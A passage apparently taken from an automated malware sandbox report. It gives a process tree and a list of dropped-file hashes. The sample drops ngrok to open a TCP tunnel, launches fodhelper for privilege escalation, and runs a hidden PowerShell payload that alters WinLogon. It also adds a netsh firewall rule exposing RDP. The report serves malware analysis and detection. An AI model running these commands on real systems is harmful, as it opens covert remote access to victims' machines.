PID:4896 -
C:\Users\Admin\AppData\Local\Temp\ngrok.exe"C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 33895⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2076
-
-
-
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"3⤵PID:3928
-
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/vhttd.exe -i4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\vhttd.exe"C:\Users\Admin\AppData\Local\Temp\vhttd.exe" -i5⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
PID:3188 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow6⤵
- Modifies Windows Firewall
PID:2584
-
-
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:2648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3620
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD5678a88c83e62ff5bf041a9ba87243fb4
SHA191a3c580f17172ed2c8d419af4b15e2c545d6a72
SHA256c9786df320ad6127bece91c530bc6fddfff41286c944fd76d44b60799dbe49b8
SHA5125392a452aceef18d3edc89c2998692dd73e551ed5c62c481a54daec564312a94fd99cc2dce2fdd18c6b297ff83ecfa181e78574423d008a456a8569f04c7daef
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
64B
MD54c1d4d9e62e20e2eccac10a5e9cd5fa8
SHA10c5b93ebec72e1bf977167cd08f4426530596190
SHA2567729f5815a7412bd5de5a2d064d9f7671bad9e77fa0b79d7ed8b6d8d4b3b8250
SHA512dd04dbc218adbe02b962b2699b536e37766bba525dcd950737e0cce4b79c6e337cf11baa710bd97e440e753d67bc7d2cd63276a56c5d544aa89738308f75d4bb
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD53bb16d80a3dbf1c6cdb06e52fcaab5ba
SHA159ab02029d135f93c5cd2b153d69663e216b1965
SHA2566ad6b4cf1bc3786ceea552b17b244a49896ee703baf53d4008262790a79c97b5
SHA512cec268b374ea8b739aaf72708d58bd425b79a411e9241ea6adfa44eb40204ed6ec509609e40b53fb6c468e037bc4b762a38a9160bf5e746c06c622e3fada5dcb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.4MB
MD5e695b8888af3b57f1a56961bd289463c
SHA1e8c3892fcf4635a16fe91b9542953e2ac5141df2
SHA256c5a45793d7c361f18d36c190b86c951bf0e7a01ad52132c7e9e9d4101eff73aa
SHA5123c1ba39b7819020ad748bfd8bc0cca01fda5e5c7a2111ec6c034bf99e1974f27cb6a1ad7b3e26ffcfb150c447349661771fd21d54c25602ab01c1b1b43346ce1
-
Filesize
3.4MB
MD5e695b8888af3b57f1a56961bd289463c
SHA1e8c3892fcf4635a16fe91b9542953e2ac5141df2
SHA256c5a45793d7c361f18d36c190b86c951bf0e7a01ad52132c7e9e9d4101eff73aa
SHA5123c1ba39b7819020ad748bfd8bc0cca01fda5e5c7a2111ec6c034bf99e1974f27cb6a1ad7b3e26ffcfb150c447349661771fd21d54c25602ab01c1b1b43346ce1
-
Filesize
3.4MB
MD5e695b8888af3b57f1a56961bd289463c
SHA1e8c3892fcf4635a16fe91b9542953e2ac5141df2
SHA256c5a45793d7c361f18d36c190b86c951bf0e7a01ad52132c7e9e9d4101eff73aa
SHA5123c1ba39b7819020ad748bfd8bc0cca01fda5e5c7a2111ec6c034bf99e1974f27cb6a1ad7b3e26ffcfb150c447349661771fd21d54c25602ab01c1b1b43346ce1
-
Filesize
20.5MB
MD50de87b2cb6b4f4c247d7f28b01f3575a
SHA1336aec3afaf84c8dc897eea14d207c5240d04312
SHA25605596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7
SHA5125e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599
-
Filesize
20.5MB
MD50de87b2cb6b4f4c247d7f28b01f3575a
SHA1336aec3afaf84c8dc897eea14d207c5240d04312
SHA25605596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7
SHA5125e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599
-
Filesize
20.5MB
MD50de87b2cb6b4f4c247d7f28b01f3575a
SHA1336aec3afaf84c8dc897eea14d207c5240d04312
SHA25605596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7
SHA5125e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599
-
Filesize
445KB
MD52612258ab4e2221b52974b5c0154fffd
SHA12aa58664874516b338325d1fd8205421815b2cba
SHA256833d6f4de177cf07ceccbb0ceb910f7785df60941a61c7154ed747ec845f51ae
SHA51202b000c89fc2f49f55e9ecacd17656cc5fbe948e2717ad4876b98d73ff30182cfa43ed05d0820cc4c427e79d6c7aaabf299a9c24158e34a96ad6008f9521483c
-
Filesize
445KB
MD52612258ab4e2221b52974b5c0154fffd
SHA12aa58664874516b338325d1fd8205421815b2cba
SHA256833d6f4de177cf07ceccbb0ceb910f7785df60941a61c7154ed747ec845f51ae
SHA51202b000c89fc2f49f55e9ecacd17656cc5fbe948e2717ad4876b98d73ff30182cfa43ed05d0820cc4c427e79d6c7aaabf299a9c24158e34a96ad6008f9521483c
-
Filesize
927KB
MD5109b36186a778c52684d5a8cba13c0d1
SHA1fba52fbec30a61a897bda2c857dd427281fc96ec
SHA25621cb9f094bb72a040fbc200ec79e7c26e22f85b365345a2f212a313d2a15da50
SHA51290468994450f9a95f3246f18448b15dacfeda02ab622c4fd081dae3082dbd1a8e9bd82cc804394e41c3e05e3d7562868a8d9ec40ca9b7133ca9a4d50c6cfa136
-
Filesize
809B
MD51b562262ecb01068d8875cb813f230c0
SHA16a2245b061f230f34cac7e6392651a73a4afb8b9
SHA2567adc38fcb5f896b8799d961a124e7414f8de076c8c44e831c286c37465136e02
SHA512232a42cf58cc1fd7983fd0f803a9e78b6d1f8704a2208d6cf824a824fb080d3930e746ac5a9781e3b7e4e2586af3ea9deae0b22c20a56a9550be206e56e69d3c
-
Filesize
74B
MD53f59f4babd65b227a58360b831b98788
SHA1defec650f03d965ed0e30998d674a548a5ef4409
SHA256e3746d47fd21a64b5d0f18226370a7e76a514b62dcc6a61174b103539600a945
SHA51226c464abf8fb60aef8eeb7717257d032ed68cee51cc794d0821b79e4e86df490d85144ff35afad4ac293fbb10765099e04ddaf2b51ec01948aad210ff6b6195c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD5fa5925d53010daf51baaf83a4530d0a7
SHA1e98fe15b480bca64f327912896fb208e5d25e882
SHA2566b0fa9c338771d61dd77986e99dab657e4f53d3d69743df73e8387ccb8a9c4f5
SHA512e9960fa90ae77b5fc96ce3842ace46ddc3990b2ca4d3a29f01308587ce36d35095373f23b69be104f8ba05f2a9e5f64f0cbc0ac684d4de0e12bf223bf811812b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD5fa5925d53010daf51baaf83a4530d0a7
SHA1e98fe15b480bca64f327912896fb208e5d25e882
SHA2566b0fa9c338771d61dd77986e99dab657e4f53d3d69743df73e8387ccb8a9c4f5
SHA512e9960fa90ae77b5fc96ce3842ace46ddc3990b2ca4d3a29f01308587ce36d35095373f23b69be104f8ba05f2a9e5f64f0cbc0ac684d4de0e12bf223bf811812b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD59c3a3bcbf1e49c0aedc344ec01778c3f
SHA19467db573901474701063db2592179723b7ebff9
SHA2560fc4e21d35e238d8ca8ff30d3f9151557cda995782506c0c5cbe6a77ed395ba0
SHA512f1a69f448d63ade9e39c38c44146aee4ddce842de03e5a78ff7809bd6e26a4972e3d1984f8f510da8fdcad54ab716368eafdb35e61a7a889f8485b859de2c792
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD59c3a3bcbf1e49c0aedc344ec01778c3f
SHA19467db573901474701063db2592179723b7ebff9
SHA2560fc4e21d35e238d8ca8ff30d3f9151557cda995782506c0c5cbe6a77ed395ba0
SHA512f1a69f448d63ade9e39c38c44146aee4ddce842de03e5a78ff7809bd6e26a4972e3d1984f8f510da8fdcad54ab716368eafdb35e61a7a889f8485b859de2c792
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD56ecba2585d52e9e47fc41767651479d6
SHA1c37605884aada75f012ece85ceaf9f8e49d3d9d0
SHA256c7ac427681fe444b398542d373c6ec3588f7d30c791dc7dde63707b61cb52adf
SHA512037d570887df4ac4cc89a145c27431e21b99efae95f0a83782ac6e863875bcd686c2ae92aca7b2cc194fc20fdefcc846b85e963e6641f4cb8d74260c9a8658a3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD57f6e15b9d38e83860783e275fca01797
SHA15d5e0a45c8a698a848c91e32a750b030a2dc6359
SHA2565d37a7d472f3470c331447aa47c861c26bde72fc6889e68d4423c69a65284117
SHA51277699f3aefca3602001492685857c533296e31315e7fe30417fb31ad7d63286ff18dd25a7267424b3e3606cd68da378bbb80ef8f95dfe9fc9e47fbe74c019c24
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD57f6e15b9d38e83860783e275fca01797
SHA15d5e0a45c8a698a848c91e32a750b030a2dc6359
SHA2565d37a7d472f3470c331447aa47c861c26bde72fc6889e68d4423c69a65284117
SHA51277699f3aefca3602001492685857c533296e31315e7fe30417fb31ad7d63286ff18dd25a7267424b3e3606cd68da378bbb80ef8f95dfe9fc9e47fbe74c019c24
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD57549f1117ddcd74ea60a39ed7509f88a
SHA194c86586149b07421ff1f745360074424e0942c4
SHA2565cc800846386194f6a6b622c071642c3ad6861a43fe715145dd2bf46d762bf5b
SHA5120b6f5c833039805ce850efb571479bfbd5fe7617c2864856ea7f0f03a2e210fd7767ea46a354aed0f31493e4f778fb4fad4a571135c05b6ccfef3041b25a88e1
-
Filesize
48KB
MD5678a88c83e62ff5bf041a9ba87243fb4
SHA191a3c580f17172ed2c8d419af4b15e2c545d6a72
SHA256c9786df320ad6127bece91c530bc6fddfff41286c944fd76d44b60799dbe49b8
SHA5125392a452aceef18d3edc89c2998692dd73e551ed5c62c481a54daec564312a94fd99cc2dce2fdd18c6b297ff83ecfa181e78574423d008a456a8569f04c7daef
-
Filesize
338KB
MD598082786e440be307873aafea2ea092e
SHA1089f39ae279fec8fe2bf6d040457e9d3d566f348
SHA2568de2b36a407ebc818459d6792b3f14cad6372a9c4756eeffeaf8455ccfba16e5
SHA5122d069b1f6144cba156eb9734b074a8c2bc42bfce14baa622c25c29d5ca81a8bdc6076eb134b0c4eaa99e834a7cae69c69c7a6e88b86e8d5b2afbf58193b908a9